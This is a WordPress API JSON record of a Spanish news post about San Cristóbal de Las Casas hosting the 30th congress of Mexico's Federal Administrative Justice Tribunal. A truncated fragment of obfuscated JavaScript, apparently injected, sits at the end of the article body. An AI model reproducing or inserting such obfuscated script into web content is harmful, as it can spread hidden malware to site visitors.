{"id":24607,"date":"2025-10-17T04:02:53","date_gmt":"2025-10-17T04:02:53","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24607"},"modified":"2025-10-17T04:02:53","modified_gmt":"2025-10-17T04:02:53","slug":"san-cristobal-de-las-casas-sede-del-30-congreso-nacional-del-tribunal-federal-de-justicia-administrativa","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24607","title":{"rendered":"San Crist\u00f3bal de Las Casas, sede del 30\u00b0 Congreso Nacional del Tribunal Federal de Justicia Administrativa"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"770\" height=\"540\" data-id=\"24608\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000385844.jpg\" alt=\"\" class=\"wp-image-24608\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000385844.jpg 770w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000385844-300x210.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000385844-768x539.jpg 768w\" sizes=\"auto, (max-width: 770px) 100vw, 770px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"24609\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000385848-1024x768.jpg\" alt=\"\" class=\"wp-image-24609\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000385848-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000385848-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000385848-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000385848-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000385848.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"24610\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000385846-1024x768.jpg\" alt=\"\" class=\"wp-image-24610\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000385846-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000385846-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000385846-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000385846-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000385846.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>San Crist\u00f3bal de Las Casas, 16 de octubre de 2025.\u2013 La presidenta municipal, Mtra. Fabiola Ricci Diestel, celebr\u00f3 que San Crist\u00f3bal fuera sede del 30\u00b0 Congreso Nacional del Tribunal Federal de Justicia Administrativa (TFJA), evento que reuni\u00f3 a magistradas y magistrados de todo el pa\u00eds, encabezados por el presidente del Tribunal, Magistrado Guillermo Valls Esponda. Destac\u00f3 que este encuentro fortalece el compromiso de acercar la justicia al pueblo con prontitud, empat\u00eda y transparencia.<\/p>\n\n\n\n<p>El gobernador de Chiapas, Dr. Eduardo Ram\u00edrez Aguilar, resalt\u00f3 la importancia de que el Congreso se realizara por primera vez en el estado, subrayando que San Crist\u00f3bal, por su historia, cultura y hospitalidad, representa un lugar emblem\u00e1tico para el di\u00e1logo y la cooperaci\u00f3n institucional. Reafirm\u00f3 que Chiapas impulsa un sistema judicial m\u00e1s humano y \u00e9tico, al servicio de la ciudadan\u00eda.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>San Crist\u00f3bal de Las Casas, 16 de octubre de 2025.\u2013 La presidenta municipal, Mtra. Fabiola Ricci Diestel, celebr\u00f3 que San Crist\u00f3bal fuera sede del 30\u00b0 Congreso Nacional del Tribunal Federal de Justicia Administrativa (TFJA), evento que reuni\u00f3 a magistradas y magistrados de todo el pa\u00eds, encabezados por el presidente del Tribunal, Magistrado Guillermo Valls Esponda. &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24608,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-24607","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24607","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24607"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24607\/revisions"}],"predecessor-version":[{"id":24611,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24607\/revisions\/24611"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24608"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24607"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24607"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24607"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}